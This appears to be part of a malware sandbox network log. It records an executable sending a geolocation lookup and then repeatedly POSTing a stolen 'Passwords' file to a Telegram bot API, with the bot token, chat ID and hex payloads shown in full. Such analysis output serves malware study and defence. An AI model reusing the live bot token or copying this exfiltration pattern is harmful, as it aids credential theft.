                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1856967
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3zFgY0h24i1eaTO8gZ3sXksBVIfgzOSGwn6PxKtap46Rl7TihpFmhZxQuE3F1NpK%2BbZUCtfncks9Fh29Ciioha%2FOqsbD0QBVlxLrBKyQKhyT4u1801LScLCL3vU9ecyOj0%2FBHi3%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8fff88e9497a8c15-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1774&min_rtt=1769&rtt_var=674&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1612368&cwnd=238&unsent_bytes=0&cid=8a34f01298985707&ts=186&x=0"
                                                                                                            2025-01-10 20:49:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.1049978149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:45 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd318e66da22f5
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:49:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 65 36 36 64 61 32 32 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd318e66da22f5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:49:45 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:45 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:45 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44704,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542185,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.1049980149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:47 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31a4b90ef901
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 20:49:47 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 34 62 39 30 65 66 39 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31a4b90ef901Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:49:47 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:47 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:47 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44705,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542187,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.1049982149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:48 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31bafa87d516
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:49:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 61 66 61 38 37 64 35 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31bafa87d516Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:49:49 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:49 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:49 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44706,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542188,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.1049984149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:50 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31cfc8c5e025
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:49:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 66 63 38 63 35 65 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31cfc8c5e025Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:49:51 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:50 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:51 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44707,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542190,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.1049986149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:52 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31e74b689e6f
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:49:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 37 34 62 36 38 39 65 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31e74b689e6fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:49:52 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:52 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:52 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 39 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44708,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542192,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.1049988149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:54 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31fd5ac83069
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:49:54 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 64 35 61 63 38 33 30 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd31fd5ac83069Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 20:49:54 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 20:49:54 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 534
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 20:49:54 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 31 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":44709,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542194,"document":{"file_name":"U


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.1049990149.154.167.2204433144C:\Users\user\Desktop\6mGpn6kupm.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 20:49:55 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3211fa17da55
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            2025-01-10 20:49:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 31 66 61 31 37 64 61 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3211fa17da55Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
